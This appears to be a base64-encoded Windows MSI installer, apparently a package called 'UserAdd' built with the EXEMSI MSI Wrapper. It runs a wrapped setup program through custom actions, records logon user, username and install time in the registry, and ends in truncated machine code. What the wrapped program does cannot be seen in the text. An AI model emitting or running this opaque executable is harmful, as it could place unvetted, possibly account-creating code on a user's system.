wAAAAAAAAAA/P//fwAAAAAAAAAAAAAAAAEAAIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////fwAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAACA/////wAAAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAD/fwCAAAAAAAAAAAD/fwCAAAAAAAAAAAD/fwCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/fwCAAAAAAAAAAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP9/AID/fwCAAAAAAAAAAAD//////38AgAAAAAAAAAAAAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/fwCAAAAAAAAAAAD/fwCAAAAAAAAAAAAAAAAA/38AgP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAACAAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANQAAADsAAAA1AAAAAAAAAAAAAAAAAAAANQAAAAAATQAAAAAAAABNAC8AAAAAAC8AAAAAAAAAYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAABgAAAAYAAAAAAAAAAAAAAAAAAAAGAAAAAAAGAAAAAAAAAAYABgAAAAAABgAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAABMAEwAfAB8AAAAAAAAAAAATAAAAAAAAABMAJQAAABMAJQAAABMAJQAAABMAKwAlABMAMgATAAAAEwATABMASwAAABMAQQBEAAAAHwBYAAAAEwATAB8AAAAAABMAEwAAAAAAEwATAGUAAABpA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CEAAQAEABQAcwABADkAAQAIAAIACAABAGMAAQAIAAIAJQABAAcAAwBBAAEACAAGAD8AAQB2AAEASgABAAQABQBOYW1lVGFibGVUeXBlQ29sdW1uX1ZhbGlkYXRpb25WYWx1ZU5Qcm9wZXJ0eUlkX1N1bW1hcnlJbmZvcm1hdGlvbkRlc2NyaXB0aW9uU2V0Q2F0ZWdvcnlLZXlDb2x1bW5NYXhWYWx1ZU51bGxhYmxlS2V5VGFibGVNaW5WYWx1ZUlkZW50aWZpZXJOYW1lIG9mIHRhYmxlTmFtZSBvZiBjb2x1bW5ZO05XaGV0aGVyIHRoZSBjb2x1bW4gaXMgbnVsbGFibGVZTWluaW11bSB2YWx1ZSBhbGxvd2VkTWF4aW11bSB2YWx1ZSBhbGxvd2VkRm9yIGZvcmVpZ24ga2V5LCBOYW1lIG9mIHRhYmxlIHRvIHdoaWNoIGRhdGEgbXVzdCBsaW5rQ29sdW1uIHRvIHdoaWNoIGZvcmVpZ24ga2V5IGNvbm5lY3RzVGV4dDtGb3JtYXR0ZWQ7VGVtcGxhdGU7Q29uZGl0aW9uO0d1aWQ7UGF0aDtWZXJzaW9uO0xhbmd1YWdlO0lkZW50aWZpZXI7QmluYXJ5O1VwcGVyQ2FzZTtMb3dlckNhc2U7RmlsZW5hbWU7UGF0aHM7QW55UGF0aDtXaWxkQ2FyZEZpbGVuYW1lO1JlZ1BhdGg7Q3VzdG9tU291cmNlO1Byb3BlcnR5O0NhYmluZXQ7U2hvcnRjdXQ7Rm9ybWF0dGVkU0RETFRleHQ7SW50ZWdlcjtEb3VibGVJbnRlZ2VyO1RpbWVEYXRlO0RlZmF1bHREaXJTdHJpbmcgY2F0ZWdvcnlUZXh0U2V0IG9mIHZhbHVlcyB0aGF0IGFyZSBwZXJtaXR0ZWREZXNjcmlwdGlvbiBvZiBjb2x1bW5BZG1pbkV4ZWN1dGVTZXF1ZW5jZUFjdGlvbk5hbWUgb2YgYWN0aW9uIHRvIGludm9rZSwgZWl0aGVyIGluIHRoZSBlbmdpbmUgb3IgdGhlIGhhbmRsZXIgRExMLkNvbmRpdGlvbk9wdGlvbmFsIGV4cHJlc3Npb24gd2hpY2ggc2tpcHMgdGhlIGFjdGlvbiBpZiBldmFsdWF0ZXMgdG8gZXhwRmFsc2UuSWYgdGhlIGV4cHJlc3Npb24gc3ludGF4IGlzIGludmFsaWQsIHRoZSBlbmdpbmUgd2lsbCB0ZXJtaW5hdGUsIHJldHVybmluZyBpZXNCYWRBY3Rpb25EYXRhLlNlcXVlbmNlTnVtYmVyIHRoYXQgZGV0ZXJtaW5lcyB0aGUgc29ydCBvcmRlciBpbiB3aGljaCB0aGUgYWN0aW9ucyBhcmUgdG8gYmUgZXhlY3V0ZWQuICBMZWF2ZSBibGFuayB0byBzdXBwcmVzcyBhY3Rpb24uQWRtaW5VSVNlcXVlbmNlQWR2dEV4ZWN1dGVTZXF1ZW5jZUJpbmFyeVVuaXF1ZSBrZXkgaWRlbnRpZnlpbmcgdGhlIGJpbmFyeSBkYXRhLkRhdGFUaGUgdW5mb3JtYXR0ZWQgYmluYXJ5IGRhdGEuQ29tcG9uZW50UHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgY29tcG9uZW50IHJlY29yZC5Db21wb25lbnRJZEd1aWRBIHN0cmluZyBHVUlEIHVuaXF1ZSB0byB0aGlzIGNvbXBvbmVudCwgdmVyc2lvbiwgYW5kIGxhbmd1YWdlLkRpcmVjdG9yeV9EaXJlY3RvcnlSZXF1aXJlZCBrZXkgb2YgYSBEaXJlY3RvcnkgdGFibGUgcmVjb3JkLiBUaGlzIGlzIGFjdHVhbGx5IGEgcHJvcGVydHkgbmFtZSB3aG9zZSB2YWx1ZSBjb250YWlucyB0aGUgYWN0dWFsIHBhdGgsIHNldCBlaXRoZXIgYnkgdGhlIEFwcFNlYXJjaCBhY3Rpb24gb3Igd2l0aCB0aGUgZGVmYXVsdCBzZXR0aW5nIG9idGFpbmVkIGZyb20gdGhlIERpcmVjdG9yeSB0YWJsZS5BdHRyaWJ1dGVzUmVtb3RlIGV4ZWN1dGlvbiBvcHRpb24sIG9uZSBvZiBpcnNFbnVtQSBjb25kaXRpb25hbCBzdGF0ZW1lbnQgdGhhdCB3aWxsIGRpc2FibGUgdGhpcyBjb21wb25lbnQgaWYgdGhlIHNwZWNpZmllZCBjb25kaXRpb24gZXZhbHVhdGVzIHRvIHRoZSAnVHJ1ZScgc3RhdGUuIElmIGEgY29tcG9uZW50IGlzIGRpc2FibGVkLCBpdCB3aWxsIG5vdCBiZSBpbnN0YWxsZWQsIHJlZ2FyZGxlc3Mgb2YgdGhlICdBY3Rpb24nIHN0YXRlIGFzc29jaWF0ZWQgd2l0aCB0aGUgY29tcG9uZW50LktleVBhdGhGaWxlO1JlZ2lzdHJ5O09EQkNEYXRhU291cmNlRWl0aGVyIHRoZSBwcmltYXJ5IGtleSBpbnRvIHRoZSBGaWxlIHRhYmxlLCBSZWdpc3RyeSB0YWJsZSwgb3IgT0RCQ0RhdGFTb3VyY2UgdGFibGUuIFRoaXMgZXh0cmFjdCBwYXRoIGlzIHN0b3JlZCB3aGVuIHRoZSBjb21wb25lbnQgaXMgaW5zdGFsbGVkLCBhbmQgaXMgdXNlZCB0byBkZXRlY3QgdGhlIHByZXNlbmNlIG9mIHRoZSBjb21wb25lbnQgYW5kIHRvIHJldHVybiB0aGUgcGF0aCB0byBpdC5DdXN0b21BY3Rpb25QcmltYXJ5IGtleSwgbmFtZSBvZiBhY3Rpb24sIG5vcm1hbGx5IGFwcGVhcnMgaW4gc2VxdWVuY2UgdGFibGUgdW5sZXNzIHByaXZhdGUgdXNlLlRoZSBudW1lcmljIGN1c3RvbSBhY3Rpb24gdHlwZSwgY29uc2lzdGluZyBvZiBzb3VyY2UgbG9jYXRpb24sIGNvZGUgdHlwZSwgZW50cnksIG9wdGlvbiBmbGFncy5Tb3VyY2VDdXN0b21Tb3VyY2VUaGUgdGFibGUgcmVmZXJlbmNlIG9mIHRoZSBzb3VyY2Ugb2YgdGhlIGNvZGUuVGFyZ2V0Rm9ybWF0dGVkRXhjZWN1dGlvbiBwYXJhbWV0ZXIsIGRlcGVuZHMgb24gdGhlIHR5cGUgb2YgY3VzdG9tIGFjdGlvbkV4dGVuZGVkVHlwZUEgbnVtZXJpYyBjdXN0b20gYWN0aW9uIHR5cGUgdGhhdCBleHRlbmRzIGNvZGUgdHlwZSBvciBvcHRpb24gZmxhZ3Mgb2YgdGhlIFR5cGUgY29sdW1uLlVuaXF1ZSBpZGVudGlmaWVyIGZvciBkaXJlY3RvcnkgZW50cnksIHByaW1hcnkga2V5LiBJZiBhIHByb3BlcnR5IGJ5IHRoaXMgbmFtZSBpcyBkZWZpbmVkLCBpdCBjb250YWlucyB0aGUgZnVsbCBwYXRoIHRvIHRoZSBkaXJlY3RvcnkuRGlyZWN0b3J5X1BhcmVudFJlZmVyZW5jZSB0byB0aGUgZW50cnkgaW4gdGhpcyB0YWJsZSBzcGVjaWZ5aW5nIHRoZSBkZWZhdWx0IHBhcmVudCBkaXJlY3RvcnkuIEEgcmVjb3JkIHBhcmVudGVkIHRvIGl0c2VsZiBvciB3aXRoIGEgTnVsbCBwYXJlbnQgcmVwcmVzZW50cyBhIHJvb3Qgb2YgdGhlIGluc3RhbGwgdHJlZS5EZWZhdWx0RGlyVGhlIGRlZmF1bHQgc3ViLXBhdGggdW5kZXIgcGFyZW50J3MgcGF0aC5GZWF0dXJlUHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgZmVhdHVyZSByZWNvcmQuRmVhdHVyZV9QYXJlbnRPcHRpb25hbCBrZXkgb2YgYSBwYXJlbnQgcmVjb3JkIGluIHRoZSBzYW1lIHRhYmxlLiBJZiB0aGUgcGFyZW50IGlzIG5vdCBzZWxlY3RlZCwgdGhlbiB0aGUgcmVjb3JkIHdpbGwgbm90IGJlIGluc3RhbGxlZC4gTnVsbCBpbmRpY2F0ZXMgYSByb290IGl0ZW0uVGl0bGVTaG9ydCB0ZXh0IGlkZW50aWZ5aW5nIGEgdmlzaWJsZSBmZWF0dXJlIGl0ZW0uTG9uZ2VyIGRlc2NyaXB0aXZlIHRleHQgZGVzY3JpYmluZyBhIHZpc2libGUgZmVhdHVyZSBpdGVtLkRpc3BsYXlOdW1lcmljIHNvcnQgb3JkZXIsIHVzZWQgdG8gZm9yY2UgYSBzcGVjaWZpYyBkaXNwbGF5IG9yZGVyaW5nLkxldmVsVGhlIGluc3RhbGwgbGV2ZWwgYXQgd2hpY2ggcmVjb3JkIHdpbGwgYmUgaW5pdGlhbGx5IHNlbGVjdGVkLiBBbiBpbnN0YWxsIGxldmVsIG9mIDAgd2lsbCBkaXNhYmxlIGFuIGl0ZW0gYW5kIHByZXZlbnQgaXRzIGRpc3BsYXkuVXBwZXJDYXNlVGhlIG5hbWUgb2YgdGhlIERpcmVjdG9yeSB0aGF0IGNhbiBiZSBjb25maWd1cmVkIGJ5IHRoZSBVSS4gQSBub24tbnVsbCB2YWx1ZSB3aWxsIGVuYWJsZSB0aGUgYnJvd3NlIGJ1dHRvbi4wOzE7Mjs0OzU7Njs4Ozk7MTA7MTY7MTc7MTg7MjA7MjE7MjI7MjQ7MjU7MjY7MzI7MzM7MzQ7MzY7Mzc7Mzg7NDg7NDk7NTA7NTI7NTM7NTRGZWF0dXJlIGF0dHJpYnV0ZXNGZWF0dXJlQ29tcG9uZW50c0ZlYXR1cmVfRm9yZWlnbiBrZXkgaW50byBGZWF0dXJlIHRhYmxlLkNvbXBvbmVudF9Gb3JlaWduIGtleSBpbnRvIENvbXBvbmVudCB0YWJsZS5GaWxlUHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4sIG11c3QgbWF0Y2ggaWRlbnRpZmllciBpbiBjYWJpbmV0LiAgRm9yIHVuY29tcHJlc3NlZCBmaWxlcywgdGhpcyBmaWVsZCBpcyBpZ25vcmVkLkZvcmVpZ24ga2V5IHJlZmVyZW5jaW5nIENvbXBvbmVudCB0aGF0IGNvbnRyb2xzIHRoZSBmaWxlLkZpbGVOYW1lRmlsZW5hbWVGaWxlIG5hbWUgdXNlZCBmb3IgaW5zdGFsbGF0aW9uLCBtYXkgYmUgbG9jYWxpemVkLiAgVGhpcyBtYXkgY29udGFpbiBhICJzaG9ydCBuYW1lfGxvbmcgbmFtZSIgcGFpci5GaWxlU2l6ZVNpemUgb2YgZmlsZSBpbiBieXRlcyAobG9uZyBpbnRlZ2VyKS5WZXJzaW9uVmVyc2lvbiBzdHJpbmcgZm9yIHZlcnNpb25lZCBmaWxlczsgIEJsYW5rIGZvciB1bnZlcnNpb25lZCBmaWxlcy5MYW5ndWFnZUxpc3Qgb2YgZGVjaW1hbCBsYW5ndWFnZSBJZHMsIGNvbW1hLXNlcGFyYXRlZCBpZiBtb3JlIHRoYW4gb25lLkludGVnZXIgY29udGFpbmluZyBiaXQgZmxhZ3MgcmVwcmVzZW50aW5nIGZpbGUgYXR0cmlidXRlcyAod2l0aCB0aGUgZGVjaW1hbCB2YWx1ZSBvZiBlYWNoIGJpdCBwb3NpdGlvbiBpbiBwYXJlbnRoZXNlcylTZXF1ZW5jZSB3aXRoIHJlc3BlY3QgdG8gdGhlIG1lZGlhIGltYWdlczsgb3JkZXIgbXVzdCB0cmFjayBjYWJpbmV0IG9yZGVyLkljb25QcmltYXJ5IGtleS4gTmFtZSBvZiB0aGUgaWNvbiBmaWxlLkJpbmFyeSBzdHJlYW0uIFRoZSBiaW5hcnkgaWNvbiBkYXRhIGluIFBFICguRExMIG9yIC5FWEUpIG9yIGljb24gKC5JQ08pIGZvcm1hdC5JbnN0YWxsRXhlY3V0ZVNlcXVlbmNlSW5zdGFsbFVJU2VxdWVuY2VMYXVuY2hDb25kaXRpb25FeHByZXNzaW9uIHdoaWNoIG11c3QgZXZhbHVhdGUgdG8gVFJVRSBpbiBvcmRlciBmb3IgaW5zdGFsbCB0byBjb21tZW5jZS5Mb2NhbGl6YWJsZSB0ZXh0IHRvIGRpc3BsYXkgd2hlbiBjb25kaXRpb24gZmFpbHMgYW5kIGluc3RhbGwgbXVzdCBhYm9ydC5NZWRpYURpc2tJZFByaW1hcnkga2V5LCBpbnRlZ2VyIHRvIGRldGVybWluZSBzb3J0IG9yZGVyIGZvciB0YWJsZS5MYXN0U2VxdWVuY2VGaWxlIHNlcXVlbmNlIG51bWJlciBmb3IgdGhlIGxhc3QgZmlsZSBmb3IgdGhpcyBtZWRpYS5EaXNrUHJvbXB0RGlzayBuYW1lOiB0aGUgdmlzaWJsZSB0ZXh0IGFjdHVhbGx5IHByaW50ZWQgb24gdGhlIGRpc2suICBUaGlzIHdpbGwgYmUgdXNlZCB0byBwcm9tcHQgdGhlIHVzZXIgd2hlbiB0aGlzIGRpc2sgbmVlZHMgdG8gYmUgaW5zZXJ0ZWQuQ2FiaW5ldElmIHNvbWUgb3IgYWxsIG9mIHRoZSBmaWxlcyBzdG9yZWQgb24gdGhlIG1lZGlhIGFyZSBjb21wcmVzc2VkIGluIGEgY2FiaW5ldCwgdGhlIG5hbWUgb2YgdGhhdCBjYWJpbmV0LlZvbHVtZUxhYmVsVGhlIGxhYmVsIGF0dHJpYnV0ZWQgdG8gdGhlIHZvbHVtZS5Qcm9wZXJ0eVRoZSBwcm9wZXJ0eSBkZWZpbmluZyB0aGUgbG9jYXRpb24gb2YgdGhlIGNhYmluZXQgZmlsZS5OYW1lIG9mIHByb3BlcnR5LCB1cHBlcmNhc2UgaWYgc2V0dGFibGUgYnkgbGF1bmNoZXIgb3IgbG9hZGVyLlN0cmluZyB2YWx1ZSBmb3IgcHJvcGVydHkuICBOZXZlciBudWxsIG9yIGVtcHR5LlJlZ2lzdHJ5UHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4uUm9vdFRoZSBwcmVkZWZpbmVkIHJvb3Qga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUsIG9uZSBvZiBycmtFbnVtLktleVJlZ1BhdGhUaGUga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUuVGhlIHJlZ2lzdHJ5IHZhbHVlIG5hbWUuVGhlIHJlZ2lzdHJ5IHZhbHVlLkZvcmVpZ24ga2V5IGludG8gdGhlIENvbXBvbmVudCB0YWJsZSByZWZlcmVuY2luZyBjb21wb25lbnQgdGhhdCBjb250cm9scyB0aGUgaW5zdGFsbGluZyBvZiB0aGUgcmVnaXN0cnkgdmFsdWUuVXBncmFkZVVwZ3JhZGVDb2RlVGhlIFVwZ3JhZGVDb2RlIEdVSUQgYmVsb25naW5nIHRvIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC5WZXJzaW9uTWluVGhlIG1pbmltdW0gUHJvZHVjdFZlcnNpb24gb2YgdGhlIHByb2R1Y3RzIGluIHRoaXMgc2V0LiAgVGhlIHNldCBtYXkgb3IgbWF5IG5vdCBpbmNsdWRlIHByb2R1Y3RzIHdpdGggdGhpcyBwYXJ0aWN1bGFyIHZlcnNpb24uVmVyc2lvbk1heFRoZSBtYXhpbXVtIFByb2R1Y3RWZXJzaW9uIG9mIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC4gIFRoZSBzZXQgbWF5IG9yIG1heSBub3QgaW5jbHVkZSBwcm9kdWN0cyB3aXRoIHRoaXMgcGFydGljdWxhciB2ZXJzaW9uLkEgY29tbWEtc2VwYXJhdGVkIGxpc3Qgb2YgbGFuZ3VhZ2VzIGZvciBlaXRoZXIgcHJvZHVjdHMgaW4gdGhpcyBzZXQgb3IgcHJvZHVjdHMgbm90IGluIHRoaXMgc2V0LlRoZSBhdHRyaWJ1dGVzIG9mIHRoaXMgcHJvZHVjdCBzZXQuUmVtb3ZlVGhlIGxpc3Qgb2YgZmVhdHVyZXMgdG8gcmVtb3ZlIHdoZW4gdW5pbnN0YWxsaW5nIGEgcHJvZHVjdCBmcm9tIHRoaXMgc2V0LiAgVGhlIGRlZmF1bHQgaXMgIkFMTCIuQWN0aW9uUHJvcGVydHlUaGUgcHJvcGVydHkgdG8gc2V0IHdoZW4gYSBwcm9kdWN0IGluIHRoaXMgc2V0IGlzIGZvdW5kLkNvc3RJbml0aWFsaXplRmlsZUNvc3RDb3N0RmluYWxpemVJbnN0YWxsVmFsaWRhdGVJbnN0YWxsSW5pdGlhbGl6ZUluc3RhbGxBZG1pblBhY2thZ2VJbnN0YWxsRmlsZXNJbnN0YWxsRmluYWxpemVFeGVjdXRlQWN0aW9uUHVibGlzaEZlYXR1cmVzUHVibGlzaFByb2R1Y3Riei5XcmFwcGVkU2V0dXBQcm9ncmFtYnouQ3VzdG9tQWN0aW9uRGxsYnouUHJvZHVjdENvbXBvbmVudHtFREUxMEY2Qy0zMEY0LTQyQ0EtQjVDNy1BREI5MDVFNDVCRkN9QlouSU5TVEFMTEZPTERFUnJlZzlDQUU1N0FGN0I5RkI0RUYyNzA2Rjk1QjRCODNCNDE5U2V0UHJvcGVydHlGb3JEZWZlcnJlZGJ6Lk1vZGlmeVJlZ2lzdHJ5W0JaLldSQVBQRURfQVBQSURdYnouU3Vic3RXcmFwcGVkQXJndW1lbnRzX1N1YnN0V3JhcHBlZEFyZ3VtZW50c0A0YnouUnVuV3JhcHBlZFNldHVwW2J6LlNldHVwU2l6ZV0gIltTb3VyY2VEaXJdXC4iIFtCWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVNdICpbQlouRklYRURfSU5TVEFMTF9BUkdVTUVOVFNdW1dSQVBQRURfQVJHVU1FTlRTXV9Nb2RpZnlSZWdpc3RyeUA0YnouVW5pbnN0YWxsV3JhcHBlZF9Vbmluc3RhbGxXcmFwcGVkQDRQcm9ncmFtRmlsZXNGb2xkZXJieGp2aWx3N3xbQlouQ09NUEFOWU5BTUVdVEFSR0VURElSLlNvdXJjZURpclByb2R1Y3RGZWF0dXJlTWFpbiBGZWF0dXJlRmluZFJlbGF0ZWRQcm9kdWN0c0xhdW5jaENvbmRpdGlvbnNWYWxpZGF0ZVByb2R1Y3RJRE1pZ3JhdGVGZWF0dXJlU3RhdGVzUHJvY2Vzc0NvbXBvbmVudHNVbnB1Ymxpc2hGZWF0dXJlc1JlbW92ZVJlZ2lzdHJ5VmFsdWVzV3JpdGVSZWdpc3RyeVZhbHVlc1JlZ2lzdGVyVXNlclJlZ2lzdGVyUHJvZHVjdFJlbW92ZUV4aXN0aW5nUHJvZHVjdHNOT1QgUkVNT1ZFIH49IkFMTCIgQU5EIE5PVCBVUEdSQURFUFJPRFVDVENPREVSRU1PVkUgfj0gIkFMTCIgQU5EIE5PVCBVUEdSQURJTkdQUk9EVUNUQ09ERU5PVCBXSVhfRE9XTkdSQURFX0RFVEVDVEVERG93bmdyYWRlcyBhcmUgbm90IGFsbG93ZWQuQUxMVVNFUlMxQVJQTk9SRVBBSVJBUlBOT01PRElGWUJaLlZFUkZCWi5DT01QQU5ZTkFNRUVYRU1TSS5DT01CWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVMwQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSU5PTkVfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJQkFTSUNfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJUkVEVUNFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlGVUxMX1VOSU5TVEFMTF9BUkdVTUVOVFNiei5TZXR1cFNpemU5NzI4TWFudWZhY3R1cmVyUHJvZHVjdENvZGV7RDgyQUY2ODAtN0FDQS00QTQ4LUFFNTgtQUNCOEVFNDAwRDQyfVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZVVzZXJBZGQgKFdyYXBwZWQgdXNpbmcgTVNJIFdyYXBwZXIgZnJvbSB3d3cuZXhlbXNpLmNvbSlQcm9kdWN0VmVyc2lvbjEuMC4wLjBXSVhfVVBHUkFERV9ERVRFQ1RFRFNlY3VyZUN1c3RvbVByb3BlcnRpZXNXSVhfRE9XTkdSQURFX0RFVEVDVEVEO1dJWF9VUEdSQURFX0RFVEVDVEVEU09GVFdBUkVcW0JaLkNPTVBBTllOQU1FXVxNU0kgV3JhcHBlclxJbnN0YWxsZWRcW0JaLldSQVBQRURfQVBQSURdTG9nb25Vc2VyW0xvZ29uVXNlcl1yZWcwNDkzNzZERTM1MTY0MjY2QTZGM0FDNDYxQjgxM0ZBNVVTRVJOQU1FW1VTRVJOQU1FXXJlZ0FGODhFMTMzNjZBMTc5QzRFQkZGNzYzRUVBM0RBMjA3RGF0ZVtEYXRlXXJlZzlCRjBGQzAxQUMxQTNBRDEzQTkzMEIwNjYyRTQyMzM0VGltZVtUaW1lXXJlZzRERDA4NzdDNjREN0ZGOTk1OUI0OEJDNUIwOTg1RURFV1JBUFBFRF9BUkdVTUVOVFNbV1JBUFBFRF9BUkdVTUVOVFNdV0lYX0RPV05HUkFERV9ERVRFQ1RFRFBvd2VyVXB7MTk5MWRmYWEtNWM1Mi00YTRiLWIyYWMtNmNkN2I2ZDk4ZTkxfYPEFDhd9HQHi0Xwg2Bw/TPA6aQBAAA5XRR0DIN9FAJ8yoN9FCR/xFYPtzeJXfyDxwLrBQ+3N0dHjUXoUGoIVuhHWAAAg8QMhcB16GaD/i11BoNNGALrBmaD/it1BQ+3N0dHOV0UdTNW6ENWAABZhcB0CcdFFAoAAADrRg+3B2aD+Hh0D2aD+Fh0CcdFFAgAAADrLsdFFBAAAACDfRQQdSFW6ApWAABZhcB1Fg+3B2aD+Hh0BmaD+Fh1B0dHD7c3R0eDyP8z0vd1FIlV+IvYVujcVQAAWYP4/3UpakFYZjvGdwZmg/5adgmNRp9mg/gZdzGNRp9mg/gZD7fGdwOD6CCDwMk7RRRzGoNNGAg5XfxyKXUFO0X4diKDTRgEg30QAHUki0UYT0+oCHUig30QAHQDi30Mg2X8AOtdi038D69NFAPIiU38D7c3R0frgb7///9/qAR1G6gBdT2D4AJ0CYF9/AAAAIB3CYXAdSs5dfx2Juj4+f//9kUYAccAIgAAAHQGg038/+sP9kUYAmoAWA+VwAPGiUX8i0UQXoXAdAKJOPZFGAJ0A/dd/IB99AB0B4tF8INgcP2LRfxfW8nDi/9Vi+wzwFD/dRD/dQz/dQg5BcQoQQB1B2gwHEEA6wFQ6OD9//+DxBRdw7iAEUEAw6HAPEEAVmoUXoXAdQe4AAIAAOsGO8Z9B4vGo8A8QQBqBFDokEUAAFlZo7wsQQCFwHUeagRWiTXAPEEA6HdFAABZWaO8LEEAhcB1BWoaWF7DM9K5gBFBAOsFobwsQQCJDAKDwSCDwgSB+QAUQQB86mr+Xj